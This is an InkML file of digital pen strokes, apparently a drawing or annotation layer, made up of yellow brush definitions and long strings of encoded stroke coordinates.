  <inkml:trace contextRef="#ctx0" brushRef="#br0">134 220 24575,'0'11'0,"-1"1"0,-1-1 0,0 1 0,-1-1 0,0 0 0,0 0 0,-1 0 0,-1 0 0,0 0 0,0-1 0,-1 0 0,-14 18 0,8-9 0,0 1 0,1 0 0,-14 39 0,21-50 0,2 1 0,-1-1 0,1 1 0,1 0 0,0-1 0,0 1 0,1 0 0,0 0 0,0 0 0,1 0 0,4 13 0,-4-17 0,1-1 0,0 1 0,1-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 0 0,0-1 0,7 8 0,3 0 0,1 0 0,17 10 0,24 20 0,-42-30 0,1 0 0,0-1 0,1-1 0,0-1 0,34 15 0,-29-16 0,1-2 0,1 0 0,-1-1 0,37 3 0,92-5 0,-102-4 0,-43 1 0,1 0 0,-1-1 0,0 0 0,1-1 0,-1 1 0,0-1 0,0-1 0,0 1 0,8-5 0,48-35 0,-19 11 0,-34 25 0,0 0 0,-1 0 0,0 0 0,0-1 0,11-13 0,-15 16 0,-2 0 0,1-1 0,0 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,0 0 0,1 0 0,-2 0 0,1-1 0,-1-4 0,0-236 0,-2 99 0,0 131 0,0 0 0,-1 0 0,-1 0 0,0 1 0,-1 0 0,-1-1 0,-1 2 0,-14-26 0,19 36 0,-1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0 0 0,-1-1 0,1 1 0,0 1 0,-1-1 0,0 1 0,1 0 0,-10-3 0,-7-1 0,-1 0 0,-27-2 0,-11-3 0,18-4 0,32 11 0,1 0 0,-1 1 0,0 0 0,-1 1 0,-15-2 0,6 3-1365,1 1-5461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4:27:29.598"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'22'1'0,"-1"0"0,0 1 0,31 7 0,-16-1 0,-21-6 0,0 2 0,0-1 0,0 2 0,0 0 0,-1 1 0,16 8 0,-19-8 0,1-1 0,0-1 0,0 0 0,1-1 0,-1 0 0,1 0 0,15 0 0,-11-1 0,-1 0 0,0 1 0,28 10 0,24 8 0,-48-16 0,37 15 0,-38-12 0,0-1 0,1 0 0,0-2 0,1 0 0,40 3 0,-30-3 0,41 11 0,-48-10 0,-1 0 0,1-2 0,41 2 0,-57-6 0,2 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1 1 0,1 0 0,-1 0 0,0 1 0,1 0 0,9 5 0,9 5 0,51 15 0,-51-18 0,-8-5 0,0 0 0,28 2 0,-27-4 0,-1 0 0,28 9 0,-6 2 0,1-2 0,46 8 0,19 0 0,25 2 0,-14 2 0,-46-6 0,37 6 0,-60-16 0,-23-3 0,47 3 0,-56-7 0,0 2 0,-1 0 0,1 1 0,19 7 0,-19-6 0,-1 0 0,1-1 0,0-1 0,20 2 0,34 1-33,-1 3-1,0 3 0,94 30 1,-71-18-659,178 36 692,-82-23 0,-159-32-22,-2-2 192,-1 2 0,1 0-1,-2 2 1,40 15-1,-54-17-169,0-1 0,1 0 0,-1-1 0,1 0 0,19 1 0,-21-3 0,-7 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,6 5 0,-6-5 0,0 0 0,1 1 0,0-2 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1-1 0,8 3 0,13 0 0,1 2 0,-1 0 0,-1 2 0,42 19 0,-19-8 0,58 17 0,-64-23 0,49 8 0,-65-17 0,-1 1 0,41 15 0,-32-9 0,0-1 0,1-2 0,0-1 0,39 2 0,-42-5 0,2 2 0,42 13 0,-7-2 0,106 26 0,56 24 0,-154-42 0,15 10 0,-60-22 0,0-2 0,50 13 0,110 19 0,-158-36 0,-1 1 0,50 21 0,-49-17 0,0 0 0,42 7 0,8 1 0,-61-13 0,1-2 0,-1 0 0,45 3 0,-39-5 0,0 0 0,0 2 0,-1 1 0,1 2 0,-1 0 0,32 15 0,-28-10 0,1-2 0,0-1 0,37 6 0,-30-9 0,0 2 0,54 20 0,-75-21 0,1-1 0,0 0 0,0-1 0,0-1 0,1-1 0,-1-1 0,26 1 0,-30-2 0,0 0 0,0 1 0,0 0 0,27 10 0,28 7 0,-36-15 0,96 21 0,-65 0 0,-55-21 0,0 0 0,1-1 0,0 0 0,0-1 0,0 0 0,0 0 0,13 0 0,-14-2 0,1 1 0,0 0 0,-1 1 0,1 0 0,17 8 0,23 7 0,-42-14 0,0-1 0,0 1 0,0 1 0,0 0 0,-1 0 0,0 1 0,12 10 0,-10-8 0,0-1 0,0 1 0,0-2 0,19 9 0,-3-4 0,-6-2 0,0-2 0,24 7 0,-31-10 0,0 0 0,0 1 0,0 1 0,12 8 0,25 11 0,-5-3 0,-36-17 0,0 0 0,1-1 0,0 1 0,19 4 0,-19-6 0,1 1 0,-1 0 0,14 6 0,29 12 0,-21-13 0,-2 2 0,1 1 0,-1 2 0,-1 0 0,0 2 0,50 38 0,-70-49 0,-1-1 0,1 0 0,0 0 0,0-1 0,0 0 0,0-1 0,0 0 0,20 2 0,-15-2 0,0 0 0,0 2 0,15 4 0,26 15 0,96 57 0,-130-69 0,1-1 0,31 10 0,-31-12 0,0 0 0,33 19 0,-11-5 0,-32-17 0,-1 1 0,21 12 0,-10-4 0,-1-2 0,2 0 0,0-2 0,37 12 0,0 1 0,-40-15 0,1-1 0,0-1 0,0-1 0,1-1 0,-1-1 0,1-1 0,34 0 0,-31 0 0,0 1 0,0 1 0,-1 1 0,1 1 0,-1 2 0,28 12 0,51 14 0,35-4 0,-68-16 0,93 32 0,-126-34 0,0-2 0,0-2 0,69 7 0,-72-10 0,-1 2 0,37 12 0,-38-10 0,-1-1 0,50 7 0,-47-11 0,56 16 0,4 1 0,-49-13 0,-26-3 0,39 2 0,38 5 0,-63-7 0,38 2 0,-40-5 0,34 6 0,-35-3 0,43 1 0,-45-4 0,41 7 0,-41-4 0,43 1 0,-46-6 0,1 0 0,-1 2 0,38 8 0,-39-6 0,0-1 0,1-1 0,0-1 0,27-3 0,49 3 0,8 20 0,-75-12 0,-1 1 0,0 1 0,0 2 0,59 32 0,-35-16 0,81 50 0,-116-67 0,0-1 0,1 0 0,41 12 0,-47-18 0,-10-3 0,0 0 0,0 0 0,0 1 0,0 0 0,-1 0 0,13 8 0,-14-8-136,0 0-1,0-1 1,1 1-1,-1-1 1,0 0-1,1 0 1,0-1-1,-1 0 0,13 1 1,-1-1-6690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1:56:07.455"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 8329 24575,'4'-1'0,"1"0"0,-1 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,6-3 0,11-5 0,74-15 0,5-1 0,53-19 0,-36 13 0,-30 9-640,93-13-1,-57 14 755,221-36-4668,-225 40 3977,41-1 749,9-1-2499,-44-1 2047,342-51-910,-261 42 1190,152-15 0,-254 36 1132,170-39 0,97-48 1484,-330 85-2576,344-96-1332,-297 91 1207,-62 13 90,0-1 0,46-14 0,301-122-5,-243 89 0,72-26 0,-157 60 0,77-44 0,-13 6 0,9-6 34,-78 38-13,1 3 1,68-26 0,107-36-55,-86 31 455,-59 24-353,210-72-60,-132 62-9,33-11 0,14-15 0,111-41 0,-126 46-36,-99 33 0,118-51 1,-86 19-415,102-45-824,-184 90 1284,-8 3 214,1-1-1,-1-1 0,26-18 1,44-32-16,-21 15-215,81-69 0,-57 38 7,-58 49 0,-2-1 0,62-67 0,-81 79 211,0 0-1,1 2 1,1 0 0,32-19 0,-32 22-11,-1 0 1,0-1 0,-1-1 0,-1-1-1,27-30 1,45-54 1268,-71 82-1366,-4 4-103,1 2 0,0-1 0,19-10 0,19-14 0,-28 14 112,39-46 0,-51 53-61,1 0 0,0 0 0,1 1-1,1 1 1,0 0 0,1 1 0,0 1 0,20-10-1,-24 16-50,-1-1 0,1-1 0,-1 1 0,0-2 0,0 0 0,-1 0 0,0-1 0,-1 0 0,10-11 0,11-13 0,2 3 0,1 0 0,50-32 0,27-25 0,116-111 0,-67 64 0,-136 113 48,126-126 993,-118 115-1041,54-45 0,18-17 0,-55 38 0,-28 31 0,1 2 0,26-23 0,-9 9 0,-1-2 0,44-59 0,-22 24 0,21-27 0,-37 45 0,68-69 0,-86 99 51,-2-1 0,23-35 0,-23 30 16,39-43 0,-55 68-139,8-10 251,1 2 1,1 0-1,23-16 0,-31 25-179,-1-1 0,-1 0 0,1 0 0,-1-1 0,0 1 0,-1-2 0,0 1 0,0-1 0,7-14 0,-3 7 0,2 0 0,0 0 0,0 1 0,2 0 0,18-15 0,81-57 0,-82 64 0,-22 16 0,0-1 0,-1 0 0,0 0 0,9-14 0,-12 15 0,1-1 0,0 1 0,1 0 0,0 1 0,0-1 0,0 1 0,11-7 0,25-14 0,-1-3 0,-2-2 0,48-47 0,11-9 0,-3-3 0,-69 63 0,0 2 0,2 1 0,46-31 0,-11 13 0,-1-4 0,61-58 0,-59 58 0,-18 14 0,-7 4 0,-17 13 0,-1-1 0,0-1 0,37-41 0,-43 43 0,0 1 0,2 0 0,0 1 0,0 1 0,1 1 0,1 0 0,24-10 0,1-2 0,-33 17 0,-1-1 0,-1 0 0,16-16 0,10-8 0,-1 4 0,-22 16 0,1 1 0,1 0 0,0 1 0,21-10 0,33-20 0,-54 30 0,1 1 0,0 0 0,28-10 0,-19 8 0,0-1 0,0-1 0,-1-1 0,0-2 0,27-22 0,-43 31 0,11-5 0,0 1 0,1 1 0,24-9 0,-25 11 0,16-6 0,46-11 0,6-1 0,-55 15-109,0 0 0,1 3 0,0 1 0,49-5 0,-63 9 109,-1 0 0,1-2 0,-1 0 0,0-1 0,19-9 0,-11 4 0,35-9 0,-34 12 163,-1-2 1,45-22-1,-42 18-108,16-8-55,5 0 0,-1-3 0,56-38 0,-100 60 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,1 0 0,-1 0 0,10 0 0,-8 1 0,0-1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,10-6 0,-5 2 0,1 0 0,-1 1 0,1 0 0,0 1 0,0 1 0,0 0 0,14 0 0,-21 1 0,2 0 0,1-1 0,-1 0 0,1-1 0,-1 0 0,0 0 0,0-1 0,-1 0 0,1 0 0,8-8 0,-6 6 0,1-1 0,-1 1 0,23-8 0,35-7 0,-23 8 0,84-37 0,-97 36 0,69-19 0,-6 2 0,39-7 0,-98 26 0,1 2 0,63-8 0,3-2 0,-21 4 0,-42 8 0,67-20 0,45-16 0,-90 20 0,-35 12 0,0 2 0,47-11 0,-11 2 0,-52 15 0,0 0 0,0 1 0,1 0 0,0 0 0,21-1 0,36 4 0,-27 1 0,0-2 0,0-2 0,54-11 0,-60 7 0,0 1 0,0 2 0,63 1 0,-87 2 0,0 0 0,0-1 0,0 0 0,0-1 0,18-7 0,-17 5 0,0 1 0,1 1 0,-1 0 0,15-1 0,291 2 0,-155 5 0,482-3-732,-618 1 732,41 7 0,19 2 0,13-10-1243,-85 0-4973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4:27:30.814"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">193 0 24575,'-1'13'0,"1"0"0,1 0 0,0 0 0,1-1 0,0 1 0,1 0 0,1-1 0,0 0 0,0 0 0,1 0 0,1 0 0,0-1 0,0 0 0,10 12 0,35 44 0,-33-44 0,-1 0 0,17 34 0,-9-16 0,-16-27 0,0 1 0,-1 0 0,0 0 0,6 22 0,-13-33 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0 1 0,0-1 0,0-1 0,-1 1 0,1 0 0,-4 2 0,-18 13 0,-31 19 0,32-23 0,-1 0 0,-1-2 0,0-1 0,-43 13 0,-25 11 0,83-30-36,1 1-1,0 0 0,1 0 0,-1 1 1,1 0-1,-7 8 0,0-1-1071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4:27:33.312"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 61 24575,'6'-1'0,"0"0"0,1 0 0,-1-1 0,0 0 0,0 0 0,0 0 0,10-7 0,18-5 0,-17 9 0,1-1 0,0 1 0,36-6 0,-52 11 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 1 0,1-1 0,-2 0 0,1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 3 0,1 10 0,0 0 0,-1 0 0,0 29 0,-2-36 0,2 52 0,0-37 0,0-1 0,-2 1 0,0-1 0,-2 0 0,-6 26 0,3-30 0,-2 0 0,-9 17 0,-10 24 0,2-6 0,17-38 0,1 0 0,-6 18 0,12-32 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,2 1 0,4 1 0,1-1 0,0 1 0,0-1 0,11-1 0,4 2 0,11 4-455,1-1 0,56 0 0,-73-5-6371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4:27:35.093"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">482 0 24575,'-7'1'0,"1"-1"0,0 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0 1 0,1-1 0,-9 6 0,-4 4 0,-29 25 0,-8 6 0,41-33 0,0 0 0,1 2 0,0 0 0,1 0 0,0 1 0,1 0 0,-15 25 0,18-23 0,1-1 0,-9 27 0,-12 25 0,18-49 0,1 0 0,0 1 0,2 0 0,0 0 0,1 1 0,0 0 0,2 0 0,-4 31 0,-2 23 0,5-53 0,-1 39 0,5-35 0,-1 0 0,-8 46 0,5-41 0,1 1 0,2 0 0,1 0 0,5 58 0,-4-82 0,1 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,7 7 0,-2-4 0,1-1 0,0 0 0,0 0 0,1-1 0,18 9 0,18 14 0,-37-22 0,0-1 0,0 0 0,0-1 0,20 9 0,-11-9 0,-1-1 0,1-1 0,0 0 0,0-2 0,29 0 0,11 1 0,-43 1 0,0-1 0,-1 2 0,1 0 0,-1 1 0,21 10 0,-22-9 0,0-1 0,0 0 0,0-1 0,1 0 0,0-1 0,16 1 0,-14-4 0,0-2 0,0 0 0,0 0 0,-1-2 0,1 0 0,0 0 0,-1-2 0,0 0 0,19-11 0,-23 12 0,1 0 0,-1-1 0,0-1 0,0 0 0,-1 0 0,0-1 0,0 0 0,-1-1 0,0 0 0,8-11 0,2-6 0,-15 21 0,0 0 0,0 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,3-9 0,1-3 0,2-1 0,0 2 0,0-1 0,2 1 0,0 0 0,12-14 0,20-33 0,-11 17 0,-25 38 0,0 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,-1 0 0,1-1 0,-2 1 0,1-1 0,-1 0 0,1-11 0,-3-1 0,1 1 0,1-1 0,1 1 0,1-1 0,1 1 0,13-34 0,-10 29 0,-1 0 0,0 0 0,-2-1 0,-1 0 0,-2 0 0,0 0 0,-2-1 0,-6-52 0,5 76 0,0 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-6-2 0,-1-1 0,-1 0 0,0 1 0,0 0 0,-1 1 0,-12-2 0,2 0 0,0-1 0,1-2 0,-31-14 0,-3 0 0,-4 2 0,0 2 0,-65-9 0,82 18 0,21 4 0,-1 1 0,1 1 0,-24 0 0,44 3-21,-11 0-248,1 0 0,-1-1 0,1 0 1,-21-5-1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4:27:38.393"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">15209 2042 24575,'-1'-1'0,"1"0"0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0-1 0,-1 1 0,0 0 0,-34-4 0,32 4 0,-349-3 0,181 6 0,147-5 0,-48-8 0,47 6 0,-45-3 0,-65-4 0,-10 0 0,122 11 0,-22 1 0,0-2 0,-77-12 0,94 9 0,0 2 0,-54 1 0,-14-1 0,37-8 0,44 6 0,0 1 0,-23-1 0,-62-7 0,68 6 0,-49-1 0,-766 7 0,823-2 0,-48-9 0,47 5 0,-45-2 0,49 7 0,0-1 0,0-1 0,-29-7 0,25 5 0,-1 1 0,1 1 0,-1 1 0,-28 3 0,-58-3 0,55-10 0,42 8 0,1-1 0,-26 0 0,-46 4 0,50 1 0,0-1 0,-61-9 0,57 3 0,1 3 0,-49 1 0,-26-1 0,7-18 0,70 15 0,-2-1 0,-77-2 0,-1511 10 0,1611-1 0,1 2 0,-29 7 0,27-6 0,0 1 0,-20 0 0,-27-4 0,25 0 0,0 2 0,-54 8 0,-67 12 0,138-18 0,0-1 0,-1-1 0,-42-3 0,-27 2 0,34 10 0,43-8 0,1 1 0,-26 0 0,6-2 0,-1 2 0,1 2 0,-63 17 0,12-8 0,67-13 0,1 1 0,1 0 0,-1 1 0,0 1 0,-23 10 0,-9 7 0,-64 19 0,16-7 0,36-11 0,0-4 0,-86 16 0,81-25 0,-83 15 0,116-19 0,-44 4 0,-6 0 0,-198 37 0,233-38 0,-70 23 0,28-6 0,45-14 0,12-3 0,-1 0 0,0-3 0,-55 4 0,74-8 0,1-1 0,-23 7 0,-24 2 0,-9 1 0,53-7 0,-1 0 0,-24 0 0,-127 9 0,52-3 0,19-1-57,-60 3-1025,135-11 1049,-44 8 0,-11 1 46,-452-7 879,272-6-592,222 3-300,1-1 0,-57-11 0,-71-10 0,59 13 0,65 7 0,-41-8 0,48 4 0,-11-3 0,1 2 0,-76-3 0,92 8 0,-1 0 0,1-3 0,-49-13 0,16 4 0,48 10 0,1 0 0,0 0 0,1-1 0,-1-1 0,1 1 0,0-2 0,0 0 0,1 0 0,-11-11 0,6 7 0,0 0 0,0 1 0,-17-9 0,-26-5 0,46 20 0,-1 0 0,1 0 0,1-1 0,-1-1 0,1 0 0,0 0 0,0-1 0,-15-13 0,3-1 0,0 1 0,-1 2 0,-1 0 0,-1 2 0,-29-15 0,43 24 0,0-1 0,1-1 0,0 0 0,0 0 0,-8-11 0,8 9 0,0 0 0,-1 1 0,-23-17 0,30 23 0,0 1 0,0-1 0,1 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,-2-10 0,1 8 0,0-1 0,0 1 0,-1 0 0,1 0 0,-10-13 0,-75-88 0,58 69 0,24 31 0,1 1 0,-1-1 0,-1 1 0,1 0 0,-11-8 0,10 9 0,1-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,2-1 0,-1 1 0,-4-12 0,-18-27 0,21 38 0,1-1 0,1 0 0,-1-1 0,1 1 0,1-1 0,0 0 0,0 0 0,-2-19 0,-4-15 0,6 36 0,0 0 0,0 0 0,-1 1 0,0-1 0,-1 1 0,-6-8 0,5 7 0,1-1 0,-1 0 0,-7-18 0,-30-79 0,-13-11 0,49 104 0,0 0 0,-1 1 0,-16-19 0,-2-5 0,4 0 0,2 0 0,-18-48 0,28 64 0,-1 0 0,-26-33 0,27 42 0,0 0 0,0 2 0,-1-1 0,-14-9 0,-7-6 0,-88-95 0,22 22 0,87 89 0,-1 1 0,0 0 0,0 1 0,-1 0 0,1 1 0,-2 1 0,-16-5 0,9 2 0,1 0 0,-20-11 0,-28-23 0,34 20 0,0 2 0,-47-20 0,63 33 0,0 1 0,0 1 0,-1 0 0,-18-2 0,-67-12 0,70 11 0,-1 2 0,0 1 0,-38 0 0,-509 6 0,559 1 0,0 0 0,0 2 0,1 0 0,-1 2 0,-39 15 0,7-3 0,30-12 0,21-6 0,0 1 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-4 4 0,6-4-1365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4:27:39.807"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">343 0 24575,'-3'2'0,"1"0"0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-3 4 0,-4 5 0,-87 88 0,59-65 0,-13 23 0,31-35 0,-28 49 0,15-23 0,27-43 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1 0,0-1 0,0 1 0,-2 11 0,4-14 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,6 5 0,5 7 0,1-1 0,27 21 0,-35-30 0,1 0 0,0-1 0,0 0 0,1 0 0,-1-1 0,1 0 0,0 0 0,13 1 0,-15-3-80,0 0 0,0 0-1,0 1 1,0 0 0,0 0-1,0 1 1,0 0 0,-1 0-1,0 1 1,1-1 0,-1 1 0,0 1-1,-1-1 1,1 1 0,-1 0-1,8 9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4:27:43.487"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 19 24575,'45'-16'0,"-43"15"0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 3 0,1 9 0,0 1 0,-1 0 0,-1 0 0,-3 25 0,2-12 0,1 34 0,2-44 0,-2-1 0,0 0 0,-1 0 0,0 1 0,-2-1 0,0 0 0,0 0 0,-10 23 0,35-50 0,-9 4 0,-1-1 0,1 2 0,0-1 0,22-4 0,7 6 0,0 3 0,69 6 0,-109-5 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,0 2 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0 5 0,-1 2 0,0 0 0,-1 0 0,0 0 0,-1-1 0,0 1 0,-1-1 0,-7 15 0,-21 29 0,21-37 0,0 0 0,2 0 0,-14 32 0,22-44-114,-1-1 1,0 0-1,0 0 0,-1 0 0,0-1 1,1 1-1,-1 0 0,0-1 0,0 0 1,-1 0-1,-5 5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4:27:46.386"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">501 1 24575,'-3'0'0,"-14"0"0,0 0 0,0 0 0,0 2 0,1 0 0,-1 1 0,0 0 0,-19 8 0,3 2 0,14-7 0,1 1 0,0 1 0,0 1 0,1 0 0,0 1 0,1 1 0,-25 21 0,34-25 0,-1 1 0,1 0 0,0 1 0,1-1 0,-1 1 0,2 1 0,0-1 0,0 1 0,0 0 0,1 0 0,1 0 0,0 1 0,0-1 0,1 1 0,0 0 0,0 17 0,-12 80 0,7-64 0,-3 5 0,6-31 0,1-1 0,-2 30 0,4-28 0,-9 37 0,6-36 0,-2 37 0,5-31 0,3 165 0,-1-183 0,1 0 0,0 0 0,0-1 0,1 1 0,0-1 0,6 11 0,10 28 0,-15-34 0,1 1 0,0-1 0,1 0 0,0 0 0,1-1 0,9 13 0,56 63 0,-38-47 0,-26-33 0,0 1 0,1-1 0,-1-1 0,1 0 0,0 0 0,1-1 0,0 0 0,17 7 0,21 10 0,-25-10 0,23 15 0,-41-23 0,1-1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,9 0 0,4 0 0,0-1 0,21-3 0,-34 2 0,-1 0 0,1-1 0,0 0 0,0 0 0,-1-1 0,0 1 0,1-1 0,-1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,5-6 0,27-20 0,-23 18 0,0 0 0,-1-1 0,0 0 0,-1-1 0,-1 0 0,0-1 0,16-30 0,-13 21 0,-4 10 0,-1 0 0,-1-1 0,-1 0 0,0 0 0,-1-1 0,7-28 0,-6 11 0,-1 0 0,-1 0 0,-1-43 0,-3 28 0,1 28 0,-2 0 0,0 0 0,-2 0 0,-4-22 0,3 32 0,-1 0 0,0 0 0,-1 1 0,0 0 0,-12-17 0,10 16 0,1 0 0,0 0 0,0-1 0,-5-16 0,-6-23 0,-17-67 0,32 110 0,-1-8 0,-1 0 0,-9-25 0,12 36 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,-6-3 0,-3 0-136,1 0-1,1-1 1,-1 0-1,1-1 1,0 0-1,0-1 1,1 0-1,0 0 0,-11-14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4:27:58.901"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 4 24575,'0'-3'0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4:27:59.364"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0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4:28:00.165"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>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1:56:08.891"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
